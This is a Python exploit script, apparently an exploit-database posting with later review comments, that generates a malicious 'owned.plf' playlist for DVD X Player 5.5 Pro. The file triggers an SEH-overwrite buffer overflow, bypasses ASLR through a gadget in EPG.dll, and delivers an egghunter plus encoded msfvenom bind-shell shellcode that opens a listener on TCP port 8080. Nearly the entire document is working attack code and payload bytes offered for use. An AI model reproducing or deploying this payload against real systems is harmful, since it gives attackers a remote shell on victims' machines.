
DVD X Player 5.5 Pro SEH Overwrite

Posted on 07 September 2011

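# DVD X Player 5.5 Pro
# Bypass ASLR by using a non-ASLR-enabled module (EPG.dll)
# SEH overwrite
#
# The original header states that an egghunter is not needed because at least
# 2000 bytes are available for the shellcode, yet the payload below still
# carries one (nops + egghunter + nops + egg + shellcode).  The layout is kept
# exactly as the author built it so the generated file is byte-identical.
import sys

try:
    _prompt = raw_input  # Python 2, which this script was written for
except NameError:
    _prompt = input  # Python 3

# size = 325 bytes
# ./msfvenom -p windows/shell/bind_tcp LPORT=8080 -e x86/shikata_ga_nai -b '\x00\x0a\x0d\x1a' -f c
# NOTE(review): bind_tcp opens a listener on the victim host.  Anyone who can
# reach TCP/8080 on that host gets the shell, not only the tester.
shellcode = (
    b"\xba\x16\x44\x8a\xd1\xdb\xd1\xd9\x74\x24\xf4\x5d\x29\xc9\xb1"
    b"\x4b\x31\x55\x14\x83\xc5\x04\x03\x55\x10\xf4\xb1\x76\x39\x71"
    b"\x39\x87\xba\xe1\xb3\x62\x8b\x33\xa7\xe7\xbe\x83\xa3\xaa\x32"
    b"\x68\xe1\x5e\xc0\x1c\x2e\x50\x61\xaa\x08\x5f\x72\x1b\x95\x33"
    b"\xb0\x3a\x69\x4e\xe5\x9c\x50\x81\xf8\xdd\x95\xfc\xf3\x8f\x4e"
    b"\x8a\xa6\x3f\xfa\xce\x7a\x3e\x2c\x45\xc2\x38\x49\x9a\xb7\xf2"
    b"\x50\xcb\x68\x89\x1b\xf3\x03\xd5\xbb\x02\xc7\x06\x87\x4d\x6c"
    b"\xfc\x73\x4c\xa4\xcd\x7c\x7e\x88\x81\x42\x4e\x05\xd8\x83\x69"
    b"\xf6\xaf\xff\x89\x8b\xb7\x3b\xf3\x57\x32\xde\x53\x13\xe4\x3a"
    b"\x65\xf0\x72\xc8\x69\xbd\xf1\x96\x6d\x40\xd6\xac\x8a\xc9\xd9"
    b"\x62\x1b\x89\xfd\xa6\x47\x49\x9c\xff\x2d\x3c\xa1\xe0\x8a\xe1"
    b"\x07\x6a\x38\xf5\x31\x31\x55\x3a\x0f\xca\xa5\x54\x18\xb9\x97"
    b"\xfb\xb2\x55\x94\x74\x1c\xa1\xdb\xae\xd8\x3d\x22\x51\x18\x17"
    b"\xe1\x05\x48\x0f\xc0\x25\x03\xcf\xed\xf3\x83\x9f\x41\xac\x63"
    b"\x70\x22\x1c\x0b\x9a\xad\x43\x2b\xa5\x67\xec\x9a\x81\xdb\x7b"
    b"\xde\x35\xc3\xeb\x57\xd3\x91\x1b\x31\x4b\x0e\xde\x66\x44\xa9"
    b"\x21\x4d\xf8\x62\xb6\xda\x16\xb4\xb9\xdb\x3c\x96\x16\x74\xd7"
    b"\x6d\x75\x41\xc6\x71\x50\xe2\x9f\xe6\x2e\x62\xed\x97\x2f\xaf"
    b"\x87\x57\xba\x4b\x0e\x0f\x52\x51\x77\x67\xfd\xaa\x52\xf3\x34"
    b"\x3e\x1d\x6c\x39\xae\x9d\x6c\x6f\xa4\x9d\x04\xd7\x9c\xcd\x31"
    b"\x18\x09\x62\xea\x8d\xb1\xd3\x5e\x05\xd9\xd9\xb9\x61\x46\x21"
    b"\xec\x73\xbb\xf4\xc9\xf1\xcd\x72\x3a\x3a"
)

# 32 byte egghunter (int 0x2e syscall based, see the "\xcd\x2e" below).
# The 4-byte tag "\x54\x30\x30\x57" spells "T00W"; the egg is that tag twice.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8"
    b"\x54\x30\x30\x57"  # egg - W00T
    b"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# overwrite EIP = 260 bytes
# overwrite SEH = 616 bytes - 0x61602adb pop edi; pop esi; ret [EPG.dll]
# (608 bytes of padding plus the 4-byte nSEH put the handler at offset 612..616)
# NOTE(review): the pop/pop/ret address is tied to the EPG.dll build that ships
# with this product version; re-verify it in a debugger before reusing.
egg = b"\x54\x30\x30\x57\x54\x30\x30\x57"
next_seh = b"\xeb\x06\x90\x90"  # jmp short +6: over the two nops and the 4-byte handler
seh = b"\xdb\x2a\x60\x61"  # 0x61602adb little-endian: pop/pop/ret
nops = b"\x90" * 20


def build_payload():
    """Return the contents of the malicious .plf file as bytes.

    Layout (byte offsets from the start of the file):
        0..608     padding, "A" * 608
        608..612   nSEH: short jump forward 6 bytes
        612..616   SEH handler: pop/pop/ret in EPG.dll (0x61602adb)
        616..      nops, egghunter, nops, egg, shellcode
    """
    padding = b"\x41" * 608
    return b"".join([padding, next_seh, seh, nops, egghunter, nops, egg, shellcode])


def main():
    """Write owned.plf in the current directory; exit with status 1 on failure."""
    print("====================================")
    print("DVD X Player 5.5 Pro Buffer Overflow")
    print(" SEH Overwrite - Bypass ASLR ")
    print(" Written by Blake ")
    print("====================================")
    print("[+] Creating malicious plf")
    try:
        # Binary mode: text mode on Windows would rewrite any 0x0a byte as
        # 0x0d 0x0a and silently corrupt the payload.
        with open("owned.plf", "wb") as fh:
            fh.write(build_payload())
    except (IOError, OSError) as err:
        # Only file errors are handled here; the original bare except also
        # swallowed KeyboardInterrupt and SystemExit.
        print("[X] Error creating file! (%s)" % err)
        sys.exit(1)
    print("[+] File created successfully")
    _prompt("[+] Press any key to exit")


if __name__ == "__main__":
    main()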

 
